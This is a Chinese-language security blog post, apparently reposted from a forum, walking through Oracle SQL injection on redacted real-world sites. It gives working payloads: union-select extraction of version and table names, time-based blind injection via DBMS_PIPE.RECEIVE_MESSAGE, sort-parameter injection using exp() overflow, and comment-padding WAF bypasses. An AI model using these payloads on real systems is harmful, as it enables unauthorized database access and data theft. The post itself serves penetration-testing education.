Oracle注入-案例分析

转载已于 2023-11-30 09:32:55 修改 · 748 阅读

1 ·

CC 4.0 BY-SA版权

原文链接：https://forum.butian.net/share/2585

文章标签：

#oracle #数据库 #网络安全

于 2023-11-28 20:15:00 首次发布

本文详细讲解了Oracle数据库的SQL注入注意事项，包括数据类型判断、排序注入方法（如exp()函数和延时语句）、遇到的坑和绕过WAF的方法。作者通过实例演示了如何利用排序功能进行注入攻击并确定数据库类型。

前言

今天这篇SQL注入的专题给到我们的Oracle数据库，它是甲骨文公司的一款关系数据库管理系统，其中在市面上的使用率也是很高的。因此这里有必要学习一下关于它的SQL注入的一些注意事项。我会在本篇文章中提到Oracle注入的注意点和其中的排序注入与绕过。

Oracle注入注意点

Oracle数据库在注入过程中的特别之处在于它对于字段点数据类型敏感，需要在字符型字段使用字符型数据，整型字段使用整型数据才可以。因此它在注入的过程中便需要注意判断数据字段的类型。这里我会列出案例来让大家更好的了解。

案例

https://xxx

其中点击公告信息，抓包：

其中的noteID参数存在单引号字符型注入，这里因为是纯回显的，所以就能直接判断出为oracle数据库

其中payload：

6340d33754bf402798a6051733698a3c'+and+1=dbms_pipe.receive_message('RDS',5)--，成功延时5秒：

2，则延时2秒：

其中还可以order by判断出列数为2：

而oracle数据库与mysql数据库不同点在于它对于字段点数据类型敏感，需要在字符型字段使用字符型数据，整型字段使用整型数据才可以：
比如如果这里是在在MySQL数据库中，那么这里只需要union+select+1,2就可以了；

但是这里是oracle数据库，那么这里就有些许不同了：
首先6340d33754bf402798a6051733698a3c'+union+select+1,2+from+dual--

这里的报错就直接提示了需要使用相同的数据类型，因此这里的字段类型为字符型。那么这里就需要将整型改变成字符型： 6340d33754bf402798a6051733698a3c'+union+select+'1','2'+from+dual--

那么这里说明两个字段都为字符型。

然后用select+banner+from+sys.v_$version+where+rownum=1查询数据库版本信息：

6340d33754bf402798a6051733698a3c'+union+select+'1',(select+banner+from+sys.v_$version+where+rownum=1)+from+dual--

select instance_name from V$INSTANCE查询当前数据库

6340d33754bf402798a6051733698a3c'+union+select+'1',(select+instance_name+from+V$INSTANCE)+from+dual-

获取数据库第一个表名：

select+table_name+from+user_tables+where+rownum=1

排序注入

在很多web站点中，都提供了对前端界面显示数据的排序功能，而实际中web站点的排序功能基本都是借助SQL语言的order by来实现的，其中的asc为升序排列；desc为降序排列。那么其中大概的SQL语句为SELECT * FROM users ORDER BY 1 desc/asc;这样。而存在排序注入的话，其中可控的便是desc/asc这个位置。

其中可以用报错盲注：desc,updatexml(1,concat(0x7e,(database()),0x7e),1)

也可以用延时盲注：desc,sleep(5)

以下我将采用案例来更好的让大家学习在Oracle数据库中的排序注入，以及我踩到的坑和如何爬出来的。

案例

https://x.x.x.x/，用户名xxx 密码xxx

其中点击新教务系统：

然后抓包：

其中的sSortDir_0参数发现存在关键字asc。那么这里进行一个合理的猜测，这个含有asc的参数会被拼接到sql语句中执行。
进行完猜测后，这里便开始实践来验证我的猜想。

第一步：判断是否存在sql注入

其中这里我使用判断普通sql注入的方式'、"、/0和/1来进行判断，初步判断出我的猜测是正确的，确实可能存在注入。
（这里图没存，就不贴图了）

第二步：判断数据库类型

这里判断出#不能注释：

而--可以注释：

而在mysql里#和--都可以注释，然后这里还是java站点，那么这里判断为Oracle数据库。

第三步：正式开始注入

那么这里便开始进行初步的排序注入：这里首先使用的是exp()函数来进行判断，其中数值大于709就会溢出，从而报错。果不其然，asc,exp(710)成功报错：

而asc,exp(1)返回成功：

然后这里带上延时语句：

asc,DBMS_PIPE.RECEIVE_MESSAGE('RDS',1)

asc,DBMS_PIPE.RECEIVE_MESSAGE('RDS',2)

这里可以成功延时。

遇到的坑

最后这里来讲讲踩到的坑吧：

这里一开始以为是MySQL数据库，又有依讯waf会拦截，然后就一直是用注MySQL的思维来绕过：

像这里依讯waf会把sleep(1)这样直接拦截：

不过在MySQL里这样多行注释加垃圾字符插在sleep(1)之间也是可以成功执行的，但是在Oracle里极其严格这样都是无法成功的：

sleep/*666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/(1)

这里附上图片：MySQL数据库里这样多行注释加垃圾字符插在sleep(1)之间也是可以成功延时的

这里能这么绕过，但是并没有延时。说明不是MySQL：

然后是updatexml报错注入：

这里也能用垃圾字符加多行注释来绕过，只不过这里还给拦截的原因是拦截了@@version。那么这里比如替换成@@global.max_connections来绕过waf查询全局最大连接数限制等等。

但是这里肯定是出不来的，因为这里是Oracle数据库。那么我最后是怎么发现的呢？因为我在百思不得其解的时候，突然格局打开了，重新判断了下数据库类型，然后就是上面案例中的发现了#不能注释，而--可以注释，而在MySQL数据库里#和--都可以注释，然后这里还是java站点，那么这里最终判断为Oracle数据库，然后便是直接DBMS_PIPE.RECEIVE_MESSAGE('RDS',2)，而且还没给依讯waf拦截：